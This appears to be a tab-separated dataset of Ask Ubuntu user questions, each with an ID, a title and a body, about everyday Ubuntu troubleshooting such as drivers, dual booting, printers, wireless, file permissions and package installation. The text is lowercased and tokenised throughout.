101420	restrict user to specific apps and restrict writing except when using said apps	i 'm trying to create a kids account . i 'd like to create a user account that restricts all apps by default , except a specific list of apps , i.e . firefox , yo frankie , numpty physics , etc.. additionally , i 'd like to make their entire account non-writable , with the exception that they may write if the app allows them to create a document . of course if the app they are allowed to run needs to write logs for example , this will need to be enabled too . the intended result is they would n't be able to right click on the desktop and create a directory or document . they might be able to download an executable , but not execute it . how can i do this ?
101421	install dropbox in xubuntu	using xubuntu 11.10 i figured there might be a problem installing dropbox using the .deb file from the website since xfce does n't use nautilus . some tutorials said that you have to install nautilus first which i did . but when i installed dropbox there were n't any problems and it even shows a symbol in the tray without me having to add anything . what i want to know is if installing nautilus was necessary or not and which file manager i 'm using now , thunar or nautilus ?
101426	wide screen resolution in virtualbox	i 've installed windows 7 in virtualbox hosted by ubuntu . after the installation in windows 7 i ca n't see the resolution i need ( wide screen ) . i have only the 4:3 ( 1024x768 etc . ) how can i fix this ? do i need to install the drivers for my laptop as usual ? how to force it to detect my laptop screen type ?
101430	aligning desktop icons in kubuntu	i am using kubuntu 11.10 ( kde4.7 ) . currently my desktop is in `` folder layout '' mode . i have tried align the icons on my desktop by selecting `` align to grid '' in icons option in desktop . still by icons are not properly aligned.please check the following screen shot . this simple task has given me a lot of head ache . this is so easy in ubuntu by right clicking and selecting align . can anyone please tell me how can i align my desktop icons in kubuntu .
101434	ubuntu uses more virtual memory than the physical memory	ubuntu uses only 9.7 % of the physical memory and 66 % of the virtual memory ( swap ) . how can i tell the system to take advantage of the physical memory so it would run normally ?
101437	how can i create an appmenu/dbusmenu using python ?	i want to add support for the indicator-appmenu to an application that is not written in one of the supported toolkits . i want to use a python script as a bridge and i would like to know how i attach the menu structure to the appmenu ( or to do the communication between application and appmenu ) . i found and read the following resources : https : //wiki.ubuntu.com/unity/launcherapi # python_example this explains very well how to create a dbusmenu , however they attach it to the quicklist of the launcher . i would expect a similar way to attach it to the appmenu ? wiki.ubuntu.com/desktopexperienceteam/applicationmenu no documentation available yet ( ? ) http : //developer.ubuntu.com/api/ubuntu-11.10/python/dbusmenu-0.4.html i do n't understand how this looks in a script , i would need an example . can someone tell me a python application that adds an appmenu on its own ( where the appmenu is not extracted automatically from the toolkit ) ?
101438	ca n't type lowercase q after switching to ubuntu 11.10	sorry if my english is n't perfect but i am italian . i switched yesterday to ubuntu 11.10 from 10.04 and i ca n't type lowercase q . the strange thing is that if i enter as a guest i can type it , and ubuntu even seems quicker . i searched everywere in the net and i could n't find anything . i yet checked out shorcuts like `` ctrl+q '' but even if i disable it little q just do not work . if i have to log in in ubuntu i see that i can type it in the password . i do not know what to do , is it better to re-install everything ? one other thing : before i could n't see some icons , like `` home '' and a few others ... then , by opening the guide they just appeared , as the icon for arresting the system high on the right ( the one you press to turn the computer off ) that was n't there before . but not letter q . seems that the guest version works better then the other , but i need mine . anyone may help me ? just tell me if it 's better for me and my pc to re-install everythingthank you . i ca n't help you with ubuntu but i may help you in some other way , like teaching a little italian or giving you some good recipe ; )
101443	hard drive formatting and unmounting errors	i 'm trying to format a hard drive using ubuntu 11.10 . every time that i attempt to format it from the disk utility , i get the error saying the device is busy , and under details it says : /dev/sda1 is mounted then when i try to unmount it from the disk utility , it shows that the operation has failed and says : error unmounting : umount exited with exit code 1 : helper failed with : umount : only root can unmount uuid=70d6-1701 from /boot/efi
101447	running full installation of ubuntu // full instalation of windows 7 in one pc	i must admit i 'm a total noob in this . i 've been running ubuntu 11.10 in windows 7 using wubi installation , and i love ubuntu . i would like to make a full dual boot instalation of ubuntu on my pc , because , according to what i 've read , ubuntu on wubi is a lot less efficient . can i run a full installation of ubuntu in one partition of the hard drive and a full installation of windows 7 in another one , and still be able to run grub when i boot my pc ? if it is possible , what is the best way to configure the hard drive partitions ? i have a 283.32 gb hard drive , i want to install windows in one partition and ubuntu in another , but also create a partition to share files between ubuntu and windows ... like mp3 , video , images ...
101449	gnome boxes vs virtualbox	which would be a `` faster '' more `` responsive '' virtual machine software ? gnome boxes , or virtualbox ?
101459	firefox default download directory on xubuntu	i am not much familiar with linux and can not find the default directory where the firefox stores downloaded files . firefox' preferences window says just `` downloads '' without any path to the directory .
101460	ide dvd mounting problem	how do i make ide dvd drive 'work ' properly under ubuntu ? how do i get rid of the thing down the left hand side and put it back/ normal drop down menus across top of screen as in previous releases ?
101464	nvidia driver installation results in resolution change to 800x600 with xubuntu 10.04 ( ca n't change )	i have a 2.8 p4 and a nvidia fx 5500 agp graphics card . i 've installed xubuntu 10.04 . it is way too laggy with the default o/s driver . installing the nvidia 173 driver , modaliases and nvidia-settings packages via synaptic package manager results in the following error message : an error occurred , please run package manager from the right click menu or apt-get in a terminal to see what is wrong . error : opening the cache ( e : :read , still have 11898251 to read but none left , e : the package lists or status file could not be parsed or opened . ) this usually means that your installed packages have unmet dependencies . when restarting the pc the resolution drops to 800x600 ( from the monitors native 1440x900 ) . nvidia settings can not be changed either from the xfce menu or nvidia xserver . nvidia xsever gives the following error message : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run 'nvidiaxconfig ' as root ) and restart x server . also , i ca n't find anything in any directory called xorg .
101467	ubuntu 11.10 grub and windows 7	i have a dual boot system ( windows7 and ubuntu 11.10 ) . when i start my system grub shows first , then if i choose windows7 , it then shows the windows7 boot loader . the problem now is that i have formatted my ubuntu partition , so anytime i turn up my system , i get this error : error : no such partition grub rescue > how can i fix this ?
101471	how to uninstall gcc 4.6.2	i have gcc 4.6.2 installed ( installed from tar source ) in my ubuntu server 10.10 64 bit , i have also installed gcc 4.4.5 . i want to uninstall gcc 4.6.2 and make my old gcc 4.4.5 default . how can i do this ?
101477	ssh streaming audio	so i have been using mplayer to stream my music through ssh from my laptop to my ubuntu box using : ssh user @ ip-address `` cat /some/random/directory/*mp3 '' | mplayer - i was just wondering if there is a better way of doing this because currently i can not skip through songs and such . does anyone know of a better way or a better program to stream music other than mplayer ? or perhaps some suggestion about the mplayer configuration ?
101479	are existing updates available after end of support ?	i am using ubuntu 11.04 at the moment . i like gnome 2 and its classic desktop environment . i would prefer to stay with it for as long as i can , even after it reaches eol ( end of life ) . however , i am not fully satisfied with natty and am considering downgrading to 10.10 , which expires in april this year . suppose i install ubuntu 10.10 after april , will the existing updates be available , or will canonical kill off the repositories for 10.10 completely ? will the software centre still be functional then ?
101483	is there a plugin for eclipse that packages .deb files for an existing project ?	i was wondering if there is a plugin for eclipse that allows the user to build a version of the project/application that is packaged in a .deb ? if possible to be able to modify the configurations before building it .
101484	ubuntu hostname on lan config	my host computer is windows 7 64 . i have virtualbox with an ubuntu 10.04 server x64 running as guest . my ubuntu guest has an ip of 192.168.1.104 . i have openssh installed on the guest . i can ssh into ubuntu from windows . on my host windows os , i can type 192.168.1.104 into the browser , and get your standard it works ! apache message . my ubuntu guest hostname is `` ubuntuserver01 '' when i type in `` ubuntuserver01 '' into the browser address bar on my windows host os , it wont connect to the server on the guest . is this just a problem with my /etc/hostname and /etc/hosts files ( and what do i need to change ? ) or am i missing something else ?
101490	unsupported sysv option when invoking ps	i 've installed ubuntu 11.10 today . every time i invoke ps , no matter what option i use , it always says error : unsupported sysv option . and then prints the help . do you know how to make ps work correctly or what is happening ?
101491	sound issue on 64-bit ubuntu 11.04	the sound is n't working when i try to play anything in a player or the sound in a game . sounds in the browser work however . i did the ubuntu sound troubleshooting up to aptitude -- purge reinstall , but that did n't change anything . aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc269vb analog [ alc269vb analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 lsmod | grep snd snd_seq_dummy 12798 0 snd_hda_codec_hdmi 28167 1 snd_hda_codec_realtek 336771 1 snd_hda_intel 33176 3 snd_hda_codec 103804 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13604 1 snd_hda_codec snd_pcm 96391 4 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30486 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61621 3 snd_seq_dummy , snd_seq_midi , snd_seq_midi_event snd_timer 29602 2 snd_pcm , snd_seq snd_seq_device 14462 4 snd_seq_dummy , snd_seq_midi , snd_rawmidi , snd_seq snd 67382 15 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 12680 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm lspci -v | grep -ia7 audio 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) subsystem : dell device 0455 flags : bus master , fast devsel , latency 0 , irq 42 memory at f0400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : hda intel kernel modules : snd-hda-intel -- 02:00.1 audio device : ati technologies inc manhattan hdmi audio [ mobility radeon hd 5000 series ] subsystem : dell device 0455 flags : bus master , fast devsel , latency 0 , irq 43 memory at cfedc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : hda intel kernel modules : snd-hda-intel any help is greatly appreciated . le : this is the output i get when running the alsa-info.sh script . http : //paste.pocoo.org/show/546032/
101492	two volume levels , if headphones are in and out	i 'm using xfce on xubuntu . but there is a volume control on the main taskbar thing . on windows 7 , when i plug in headphones , i have a separate set level of the volume . generally i leave the non-headphone muted , and the headphone-in one at an appropriate level . how do i do this ?
101493	is there a way to roll back a system update in 11.10 ?	earlier this week , i installed routine updates to ubuntu on my main work computer . unfortunately , there 's a huge bug in the latest update : switching windows using alt-tab crashes unity . this makes it impossible to open new applications -- or even shut down . since alt-tab is a deeply ingrained reflex for me , my computer is basically unusable as long as this continues . the bug has been reported here , but i do n't know how long it will take to fix . in the meantime , i still have work to do . is there any way to rollback the latest set or two of updates so that i can get on with my life ? ( alternatively , if anyone knows of a fix for the core bug , that would be great too . ) thanks !
101496	picasa is running but not shown anywhere on the screen or in the application bar	in my ubuntu 10.04 installation i twice experienced this problem : i installed picasa on wine and it was installed and running perfectly for some time . then i experienced when i started picasa that apparently it started but was never shown on screen . i checked that the process `` picasa3.exe '' was on the list of processes , the status was `` sleeping '' and `` pipe_wait '' . when i log on at other users of my ubuntu installation , picasa was running like it is supposed to do . how can i solve this problem ?
101500	how to auto-hide unity launcher faster ?	i can easily adjust the delay for showing the launcher with `` edge reveal timeout '' in ccsm . how can i similarly adjust the speed for auto-hiding the launcher ? i want the launcher to hide as soon as my mouse moves away from it instead of having the current ~500ms delay .
101502	corrupted theme for certain applications	i am facing a problem related to corrupted gtk theme for certain applications . my default theme is ambiance under unity . it works fine for most applications like chrome , firefox , nautilus , etc . however , for certain applications such gnome tweak tool , ubuntu tweak , etc . the gtk theme is completely black and dark . that is the background window color , making viewing the window text very difficult . this is happening with gnome shell also . i have tried resetting gnome and unity settings , reinstalling light themes , but it did n't work . also , note that i do not face this issue while using other themes such as adwaita .
101506	correct steps for adding user to /var/www	i am used to adding sites in /home/usr/public_html . but now i have decided to put sites into /var/www/site1 , /var/www/site2 , and so on . root owns /var/www/ , but you want your user to be able to work in this location so are these the right steps in order give a user permissions ? security wise , is this the right way , or is there a better way ? this is a drupal multisite 1 core instance . virtual hosts are used , but all drupal sites sit in 1 folder under the drupal core code . sudo adduser bob www-data sudo chown -r www-data : www-data /var/www sudo chmod -r g+rw /var/www
101510	why is my laptop not using the new firefox menu layout ?	on my desktop computer , firefox has the new , more compact menu , where all menus are collapsed under where it says `` firefox '' , and the tabs are beside it : but on my laptop , it 's still using the older style : both are using ubuntu 11.10 . both are firefox 9.0.1 . both are using gnome-classic . the only difference is that the laptop has compiz effects turned off , and the desktop has compiz effects turned on . but that could n't make the difference ... could it ? how do i get my laptop to show the new , more compact , firefox layout ?
101512	created ubuntu access point , ca n't connect to it .	i have created a wireless access point on my eeepc 701 running a fresh install of ubuntu 10.04 . the configuration : ubuntu 11.04 laptop -- wifi -- > ( ath0 ) eeepc ( eth0 ) -- ethernet cable -- > my isp router -- > internet i followed this guide accurately : https : //help.ubuntu.com/community/router ( only difference , i set my wireless card running madwifi drivers issueing sudo wlanconfig ath0 destroy , sudo wlanconfig ath0 create wlandev wifi0 wlanmode ap ath0 which seemed to work as my ath0 is now in master mode . my other machine can now see the connection , but ca n't seem to connect to it . looks like the connection attempt times out . why could it be ? i have spent two or three days reading how-tos and man pages , but as informative as it has been i still ca n't get things to work . some info ( i put it on pastebin so i would not flood the thread , please tell me if i need to include it here ) : http : //pastebin.com/8pxrrb4p any help would be very appreciated . please let me know if i need to post further info . thanks
101526	how can i split an animated .gif file into its component frames ?	how can i easily split an animated .gif file ? i want to see each frame . i would really prefer to not to export every frame to a directory . i 'd like to view them individually in one application if possible . is this possible on linux ?
101529	what memory scanners/editors are available ?	are there memory scanners/editors for ubuntu ( like cheatengine for windows ) ? i 'm aware of scanmem , but i 'm thinking about something with a gui and that lets me visualize the memory segment .
101532	can i get off 11.10 and go back to 10.04 ?	i want to go back to an older ubuntu but when i try to boot from a cd 11.10 somehow overrides and always boots up . i have tried from cd & usb stick .
101534	can i reset everything to its factory default settings ?	i have got many problems on my dual-boot ubuntu 11.10 . unity interface always changes from 3d to 2d automatically , when i try to create login password it does not accept my root password , the look of folders always changes automatically , i 'm always getting problems with repositories , update manager is n't working , software center does n't find any internet connection while it actually exists , can not minimize google chrome while i 'm working with other applications , and so on . i actually ca n't spend several hours on forums to fix that issues because i do not have much time for that . i want somewhat like easy way , by which you can store all settings ( passwords , unity and so on ) to its factory default settings . is there such a command or something like that to resolve this ?
101536	how do i get a canon 8600f scanner working ?	several years now i have been unable to get my canon 8600f scanner working in ubuntu . does anyone know of a way to make this work ? there is another very similar scanner that is fully supported ( the 8800f ) . is there any way to hack that particular driver to use with my 8600 ? thanks for any tips or tricks ! http : //www.sane-project.org/sane-mfgs.html # z-canon
101537	switching between different input methods phonetic vs typewriter in ibus preferences has no effect	i use ubuntu 11.10 and gnome environment . i am able to type documents in hindi by a method shown here . i installed ibus-m17n and ibus packages and have enabled support for hindi language in gnome-language-selector . i have following input methods enabled in the ibus preferences window : hindi inscript ( m17n ) hindi phonetic ( m17n ) hindi itrans ( m17n ) hindi remington ( m17n ) hindi typewriter ( m17n ) here is a screenshot of that screen : as you can see in this screenhot , these methods are available in the drop down menu of ibus . i open libreoffice and press ctrl + space so that i can type in hindi and it works . when the input method is off as in this screenshot then i am able to type in hindi with following kind of keyboard /usr/share/m17n/hi-typewriter.mim e.g . by pressing key h the letter प gets typed , which is the expected behavior . now the problem is selecting the method phonetic . pressing the key h key results in प again , which is not expected . as per my understanding the keymap for phonetic input method in this case is /usr/share/m17n/hi-phonetic.mim and given that input method phonetic is already selected ( with phonetic selection ) upon pressing the h key य should get typed . that means that selection of different input methods has no effect on typing . so is ibus not working properly or did i miss something ? how can i get the expected behavior when selecing different input methods in the ibus preference window ?
101538	i can not change my ubuntu user account password	changing the user account password seems to take forever . do any of you have this problem ?
101546	is a sony vaio z power media dock with amd radeon hd 6650m graphics a recommend buy ?	has anyone tried the sony vaio z power media dock with amd radeon hd 6650m graphics under linux ? does it work with bumblebee hybrid graphics ? i am considering it as a potential update of my current laptop .
101554	how can i disable the event sounds in kubuntu ?	i really do n't like the sounds which kubuntu plays during startup , or during thinks like moving a file to trash . how can i disable all such notification sounds ?
101555	how to get better graphics at toshiba c660 ?	recently i installed ubuntu 11.10 using wubi at my laptop toshiba c660-1c8 ( with built-in intel hd graphics ) . when i previously used windows , i had many drivers from toshiba including display driver installed . graphics was very good . but there is no drivers for linux from toshiba . now at ubuntu my graphics is very granular , blurred , with low contrast . are there drivers that can help me ? how can i make my graphics better ? resolution is set to native 1366x768 at both windows and ubuntu
101565	how to install jdk5 in ubuntu 11.04	i have installed 11.04 in my machine . i have installed jdk6 from the repository . my problem is i need to install jdk5 in my machine i have used the following command but its not working . ~ $ sudo apt-get install sun-java5-jdk it gives the following messages : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package sun-java5-jdk please help
101570	ecryptfs on too-small harddrive - how to add links into the encryption ?	i am using ecryptfs for my home directory . i now want to switch to an ssd but my home dir is currently 350gb in size and i do n't have the money to buy an ssd that size . what i got is a 128gb ssd that i want to install the root system on , as well as the `` base '' of my home directory ( incl . source code , configuration files , i.e . the files used most often ) . all the subdirectories that contain lots of data but are rarely accessed ( music , pictures , documents ) i want to keep on a plain hdd and just link the directories in . however esp . for pictures and documents i really do want to keep encryption . is there an official / efficient / easy / secure way to soft-link directories from another location into my home directory and also being encrypted ? ideally ecryptfs would handle this automatically , however auto-mounting of these directories ( preferably at least semi-automatically but definitely securely ) would be an acceptable compromise .
101573	why is hud not installing on 12.04 ?	i have recently installed ubuntu 12.04 precise pangolin from usb . i really want to test the new hud thingy but it is not installing , i`ve added the ppa , update and upgrade and nothing : ( when i press alt key it just shows me the menu on the top panel .
101574	rhythmbox interface	all versions of rhythmbox i 've used looked something like this notice at the top , there are two wide toolbars , one with buttons , the other with the song title and progress slider . apparently , it 's possible to unify the two to make rhythmbox look something like this : anyone knows how ? ps : i use ubuntu 10.04 and rhythmbox 0.12.8 bundled with it .
101575	how to restore behaviour of file save dialog ?	there 's something i find really annoying about a recent change to gnome3 and/or gtk+ . often i code on three or more different projects in a single day and then i might go to my web browser , find a pdf file and decide to save it . the problem is that the file save dialog box now shows a whole bunch of suggested places to save the file , with all the directories i 'm coding in at the top of the list . this is borked . is there some way to restore more sane behaviour ?
101578	job spooled to canon mp140 printer , but nothing printed	i am trying to print documents from my ubuntu 10.0.4 lts machine to my windows xp machine . i have a canon mp140 printer connected to my windows xp machine . i followed the instructions given here , and i managed to find and install the printer and printer driver successfully . after the printer installation , i try to print a test page ( using the printer gui ) , my ubuntu machine informs me that the print job is being spooled to the printer - but nothing gets printed to the printer . when i looked in /var/log/cups , i saw this entry in error.log : unable to remove temporary file `` /var/spool/cups/tmp/.hplip '' - is a directory and in access.log , there was this line entry : localhost - - [ 05/feb/2012:11:22:45 +0000 ] `` post /printers/canon-mp140 http/1.1 '' 200 35135 print-job successful-ok so it seems ( to me at least ) , that everything is working normally ( apart from the failure to delete the tmp file ) . does anyone know why my documents are not being printed ? ( yes , the printer is switched on . ) i installed the mp140 drivers using the instructions i found here : mp40 driver installation
101581	how can i use ubuntu as firewall server	can ubuntu be configured as a firewall server , if yes how ? , if no why ?
101583	ubuntu changes drive order with multiple hdds	my motherboard is gigabyte ga-890gpa-ud3h , and i have 4 internal hdds . the first one ( sda ) contains various ubuntu versions . others hdds contain windows xp , windows 7 , and data . however the drive order changes when there is a kernel/software update ( all the 4 hdds are connected ) . after a reboot , sda has become sdc . all the hdds are repositioned . can someone please explain how and why this happens . is there a way to stop this from changing ?
101585	using openvpn for a single window	how do i use openvpn for only one window/process ? example case scenario : i want to use a us only website on firefox , but use my ip on the chromium process
101587	how do i change directory to a folder with special characters ?	i am using ubuntu 11.10 and in terminal i want to enter the following folder : cd milano , torino ( jan ) -compressed and it does not work ! how should i write the command cd to enter this directory ?
101591	how do i install python 2.7.2 on ubuntu ?	i want to install python 2.7.2.tgz on ubuntu , downloaded from http : //python.org/download/ . is this a correct way to install : ./configure make make install if not , how can i do that ?
101597	how disable purple screen at boot time when it shows ?	i am on ubuntu 11.10 and i want to keep the purple screen , though , sometimes i also would like to hit a shortcut at boot time so i can see what the os is doing . is there anyway to accomplish this ? or my only option is with/out purple screen altogether ?
101600	my ubuntu with unity not loading after last reboot	i have asus u36sd and after last reboot i ca n't start up my ubuntu 11.10 . usually i suspend my notebook by closing cover but today i reboot it and it not starting up . booting flowing by normal till to login screen but if i move mouse cursor after that image immediately switch to console ( without any error ; only normal loading startup processes ) and back to login screen . i can type my password and boot continuing loading but after few moment it again switch back to dark console and switch again to login screen . i can load recovery mode but if i try touch my cursor ( by mouse or internal notebook touchpad ) it again switch back to console and to login screen . but if i use only keyboard it work fine . where i can see detailed log information about my problem ?
101601	can not access files using live usb	my hard drive has errors so ubuntu would n't load ! i tried the live usb to take a backup of my data ! i had two accounts ... i can access the data of one account but for the data of other account it says : only the owner has the permission or ca n't access the files the data was of 40 gb but it only shows 1.2 mb and some unreadable contents ! it does n't even show the contents ! please help ... the data is important !
101606	gnome-style notifications in unity	i was looking for a way to get gnome style notifications in unity . or at least , if thereâ´s a way of making the default unity notifications interactive and clickable ? as it is by default only a notification pops up and the user needs to find the relevant window , which i find very counterproductive .
101613	programming error in aptdaemon , how to fix it ?	i 've been trying to install some applications like skype and windows , yet same error message keeps showing there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks . traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 968 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1092 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 235 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate a file for the ttf-mscorefonts-installer package . this might mean you need to manually fix this package . i 'm a newbie to ubuntu and could n't get it fix . i tried to search for similar questions yet could n't really fix it .
101615	optimal owner / permission settings for a website directory running on apache	i am running ubuntu on my vserver and i have set up quite a few settings concerning my topic . but i am not really sure if it is set up correctly . my current setup is the following : apache2 : export apache_run_user=www-data export apache_run_group=www-data export apache_pid_file=/var/run/apache2.pid i read articles about adding an extra user e.g . sudo adduser apache which runs the apache server , so whats a good choice ? website directories : drwxr-xr-x 5 www-data : www-data 4.0k feb 5 04:16 mysite/ this directory for example is placed in /var/www . my folder settings inside the dir are chmod 755 and my files are 644 . should it be owned by www-data or by my username ? id be glad if you can give me some best practices on this . thx for advise !
101617	ubuntu-11.10 and toshiba m50-192 compatability	hi i 've tried running ubuntu-11.10-desktop-i386.iso from usb and cd ( note trying not installing ) , sometimes it makes it to the home screen ( booting from usb ) but does n't respond to mouse of keyboard input when there . is there a known issue or fix or more compatible version for use with a toshiba m50-192 laptop . would love to change from xp to linux many thanks
101619	kdevelop and git , commit button disabled	i installed kdevelop 4.2.3 , enabled git plugin and created new project with git version control system . repository was created in project directory and that 's fine . however when i right click on file in project , then i choose option git and i can do actions like add file to repo , git pull , git push etc. , however some options like commit , branches etc . are disabled . how to make them work ?
101620	unstable wireless on macbook 2,1 with ubuntu 11.10	i just installed ubuntu 11.10 as the sole os on my old white macbook 2,1 . the wireless seems really unstable . the signal is always full , but sometimes i can browse , sometimes i ca n't . sometimes i can download updates , sometimes they stop . i am using another laptop right next to it , and the network on that is flawless . any ideas ?
101624	touchpad requires you to press really hard on macbook 2.1	on my white macbook 2.1 i have to press to my finger really hard to the touchpad to even move the mouse pointer . i did not have to do that when i had osx installed on it . any ideas ?
101625	autodim does not un-dim when i start using the computer again	on my macbook 2,1 with ubuntu 11.10 , whenever i leave the computer alone for five minutes , it blacks out and wont respond to any keypresses or even the power button . update : it was the autodim feature that did n't un-dim itself after starting to use the computer again . why is that ?
101629	windows 7 ca n't find cups printer shared from ubuntu	i have ubuntu 11.10 on one computer and windows 7 on another . the ubuntu computer has a printer attached , and i want to add this printer to the windows 7 computer . printing locally works . the problem is that windows is not able to see the shared printer , so i can not add it . i am guessing that some ubuntu setting / software is still missing , but what exactly ? how can i make windows add this printer ? in the cups web front-end , the checkbox share printers connected to this system is checked . i 'm not sure whether the checkbox allow printing from the internet needs to be checked also ; i 've tried both settings , and neither worked . on windows , i can connect to the cups web front-end and see the printer listed ( see screenshot below ) . and yet , when i add that printer url , windows complains that it can not connect to the printer . the ubuntu computer is a fresh install . i already have full write access on windows shares , so something of this kind must be preconfigured out-of-the-box . i have not installed or changed any applications or settings regarding samba or smb.conf . do i need to do anything in this regard ( on ubuntu 11.10 ! ) or is that obsolete or already included and fully configured ? googling for this problem gives me plenty of material dated 2005-2009 but nothing newer . i do n't think that 's still valid in 2012 and i do n't want to mess up my new installation with outdated instructions . via one of the comments i came to this page about network printing from windows but it does not specify whether samba is already installed -- or which samba to install , because searching in the ubuntu software center yields several results .
101632	dell vostro 1000 broadcom wireless connection	i have a problem with the hardware broadcom wifi . i press the hotkey fn+f2 to activate the hardware and this will not work . i 'll look at the drivers but it appears to be installed . how can i solve this problem ? ubuntu is all new to me so if possible , give me a clear explanation . now do i connect the lan cable . i use the ubuntu 11.10 lawrence @ lawrence-vostro-1000 : ~ $ sudo lshw -class network [ sudo ] password for lawrence : pci ( sysfs ) *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:05:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:18 memory : c0200000-c0203fff *-network description : ethernet interface product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth1 version : 02 serial : 00:1c:23 : a2 : b9 : a9 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=b44 driverversion=2.0 duplex=full ip=192.168.1.18 latency=64 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:21 memory : c0300000-c0301fff lawrence @ lawrence-vostro-1000 : ~ $ lawrence @ lawrence-vostro-1000 : ~ $ rfkill list all 0 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes
101633	debian packages for ubuntu	some times it 's difficult to install a software from tgz , bz2 , ... packages . some times it does n't response good results . some times it makes persons nervous . this problem solved by using deb packages . can you recommend me a site for downloading debian package softwares ? thanks .
101636	intel 855gme driver not enabled	i have a toshiba-r15s822 tablet pc and i just made the switch to linux , ubuntu was the build of choice , thing is i tried it before and everything worked fine ( about 2 years ago , i think stuff are different now ) . almost everything is working well but the intel display driver is n't enabled , i tried updating the intel drivers from the intel repos , and modding the xorg.conf file , but i ca n't get it to work , any ideas ? another question : it 's a little bit faster after enabling unity2d , but is ubuntu 10.4 faster than this ? or slower ? and will downgrading give me a speedboost , because this is much slower than my earlier windows xp build : ( also i got my eyes on the 12.04 version , should i downgrade or upgrade ? p.s - i scoured around for solutions to this , on the web and on askubuntu.com , i 've tried most of the solutions but no avail , hope you can help me specs go here 1.6ghz centrino processor 1.5gb or ram intel 855gme with 64mbs of ram
101637	usb turn write protection off	hi i have a usb which is write protected : dmesg | tail [ 10098.126089 ] sd 7:0:0:0 : [ sdb ] write protect is on [ 10098.126098 ] sd 7:0:0:0 : [ sdb ] mode sense : 23 00 80 00 [ 10098.126779 ] sd 7:0:0:0 : [ sdb ] no caching mode page present [ 10098.126788 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 10098.131418 ] sd 7:0:0:0 : [ sdb ] no caching mode page present [ 10098.131425 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 10098.133335 ] sdb : sdb1 [ 10098.135509 ] sd 7:0:0:0 : [ sdb ] no caching mode page present [ 10098.135515 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 10098.135521 ] sd 7:0:0:0 : [ sdb ] attached scsi removable disk so how can i turn the write protection off ? what i 've tried checked if it has a hardware switch - no tried to format it on windows and on linux ( via terminal too ) tried fdisk | chmod tried to fix this with servel tools from the ubuntu software center used google and have seen about 10,000 discussions about this problem but they where never solved additional informations fsck -n /dev/sdb1 fsck from util-linux 2.19.1 dosfsck 3.0.9 , 31 jan 2010 , fat32 , lfn there are differences between boot sector and its backup . differences : ( offset : original/backup ) 65:01/00 not automatically fixing this . free cluster summary wrong ( 968250 vs. really 911911 ) auto-correcting . leaving file system unchanged . /dev/sdb1 : 50 files , 93653/1005564 clusters fdisk -l device boot . start end blocks id system /dev/sdb1 32 8060927 4030448 b w95 fat32 umount /dev/sdb1 mkfs -t vfat /dev/sdb1 mkfs.vfat 3.0.9 ( 31 jan 2010 ) mkfs.vfat : unable to open /dev/sdb1
101639	ca n't start ubuntu 11.10 , stops at login screen !	i have been trying to dual boot ubuntu with windows 7 via wubi on my custom built pc but without success . when i start the computer i can choose windows or ubuntu i choose ubuntu and when i should get to the login screen the screen just stays purple/pink . tried safe mode but cant get in there either . i have tried reinstall but did not work either . : ( the second time i install ubuntu the screen was purple/pink and the screen was cut of so the left side was on the right side and right side on left side ( hard to describe ) third time installing ( the last time ) it is just like the first time please help ! ! ! ! cant get nowhere without help i am kinda new at ubuntu and its creepy commands . had ubuntu on my old computer . i think the problem is my hardware so here is my computer specs : amd fx 6100 amd his radeon hd 6950 iceq x asus sabertooth 990fx 1tb harddrive i have no idea the name on it please help me ! ! sorry for my bad english ! : d
101641	will an atheros ar928x work with wpa2 ?	basically i need only the answer to above question . please think of that i am new to linux . for further explanation here is the full story : i have the following problem . my friends notebook ( vista ) has got a trojan and refuses to work anymore . the avira rescue cd did not help either . so i tried an old ( 9.1 ) ubuntu cd and backed up all the essential files . since we have no windows install disk we want to put ubuntu on that notebook . but with the 9.1 version there is no wlan . systemtest tells me , that it finds an atheros ar928x , but ifconfig does not show that and the network manager tells me there are no lan/wlan devices . so : does that work easier with the new ubuntu version or is that network adapter a known troublemaker ? and : if i get the adapter to work , will it work with the wpa2-network around here ?
101643	how to watch movies compressed into .bin and .cue ?	i have had some old vhs digitalized into dvd and used window 's poweriso software to back them up in my external hdd . the i 've got 4 videos that i want to run on ubuntu 11.10 : a.bin b.bin c.bin c.cue d.bin d.cue how do i watch the video contents inside of those files ?
